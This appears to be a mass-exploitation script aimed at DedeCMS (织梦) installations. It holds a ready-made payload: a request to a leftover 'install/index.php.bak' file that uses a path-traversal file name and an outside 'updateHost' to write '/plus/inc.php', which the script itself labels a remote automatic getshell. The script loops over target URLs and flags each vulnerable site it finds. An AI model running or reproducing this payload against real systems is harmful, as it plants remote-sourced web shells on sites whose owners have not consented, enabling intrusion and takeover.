#request urls = array
#define payload = /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../plus/inc.php&updateHost=www.zzgjxx.org
#define bug = 存在(您可以选择安装进行体验)
#define info = /plus/inc.php |织梦远程自动getshell

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
